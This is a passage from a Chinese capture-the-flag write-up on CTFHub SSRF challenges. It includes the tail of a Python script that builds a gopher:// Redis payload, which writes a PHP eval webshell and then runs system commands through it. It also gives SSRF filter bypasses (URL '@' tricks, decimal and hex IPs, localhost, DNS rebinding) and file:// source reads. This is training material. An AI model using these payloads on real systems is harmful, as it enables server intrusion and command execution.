cmd_ += "*" + str(len(redis_arr))
for x_ in redis_arr:
cmd_ += CRLF + "$" + str(len((x_.replace("${IFS}", " ")))) + CRLF + x_.replace("${IFS}", " ")
cmd_ += CRLF
return cmd_
if __name__ == "__main__":
payload = ""
for x in cmd:
payload += parse.quote(redis_format(x)) # url编码
payload = payload_prefix + parse.quote(payload) # 再次url编码
print(payload)
转换后的payload如下:
gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_GET%255B%2522peak%2522%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25248%250D%250Apeak.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A
返回504或如下所示不用担心,已经写入了
利用我们写入的webshell获取flag
http://challenge-ac09a2d8d337e54e.sandbox.ctfhub.com:10800/peak.php?peak=system('ls /');
http://challenge-ac09a2d8d337e54e.sandbox.ctfhub.com:10800/peak.php?peak=system('cat /flag_cd0a54e70051990d13f1fec4a08aa0f6');
URL Bypass
题目:
请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限制吧
访问后提示:url must startwith "http://notfound.ctfhub.com"
先尝试直接访问,无返回:http://challenge-24ea375bcb0132cd.sandbox.ctfhub.com:10800/?url=http://notfound.ctfhub.com
题目是URL Bypass,那么我们考虑绕过
怎样绕过这个域名呢?有如下两种方法:
方法一
http://www.baidu.com@127.0.0.1
等于http://127.0.0.1
方法二
http://www.xxx.com.127.0.0.1.nip.io/phpinfo.php
等于127.0.0.1/phpinfo.php
Payload:
?url=http://notfound.ctfhub.com@127.0.0.1/flag.php
或
?url=http://notfound.ctfhub.com.127.0.0.1.nip.io/flag.php
数字IP Bypass
题目:
这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢
解题
如题所示,我们先访问127.0.0.1,发现被ban,同时还ban掉了172、@、.
http://challenge-55916ccbe0194b1e.sandbox.ctfhub.com:10800/?url=http://127.0.0.1
那么我们要访问127.0.0.1,怎么办,有三种方法
方法一:使用数字IP
127.0.0.1的数字ip是2130706433
payload:?url=http://2130706433/flag.php
方法二:转16进制
127.0.0.1的16进制是0x7F000001
在线转换网址:https://tool.520101.com/wangluo/jinzhizhuanhuan/
payload:?url=http://0x7F000001/flag.php
302跳转 Bypass
题目:
SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧
我们查看index.php源码
?url=file:///var/www/html/index.php
<?php
error_reporting(0);
if (!isset($_REQUEST['url'])) {
header("Location: /?url=_");
exit;
}
$url = $_REQUEST['url'];
if (preg_match("/127|172|10|192/", $url)) {
exit("hacker! Ban Intranet IP");
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
flag.php源码:
?url=file:///var/www/html/flag.php
<?php
error_reporting(0);
if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
echo "Just View From 127.0.0.1";
exit;
}
echo getenv("CTFHUB");
payload:?url=http://localhost/flag.php
DNS重绑定 Bypass
题目:
关键词:DNS重绑定。剩下的自己来吧,也许附件中的链接能有些帮助
解题
使用file://协议查看inde.php和flag.php源码
index.php
<?php
error_reporting(0);
if (!isset($_REQUEST['url'])) {
header("Location: /?url=_");
exit;
}
$url = $_REQUEST['url'];
if (preg_match("/127|172|10|192/", $url)) {
exit("hacker! Ban Intranet IP");
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
flag.php
<?php
error_reporting(0);
if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
echo "Just View From 127.0.0.1";
exit;
}
echo getenv("CTFHUB");
由上可见,过滤了127、172、10、192
网址:https://lock.cmpxchg8b.com/rebinder.html
payload:
?url=7f000001.7f000002.rbndr.us/flag.php
或
?url=qk8zsr.dnslog.cn/flag.php
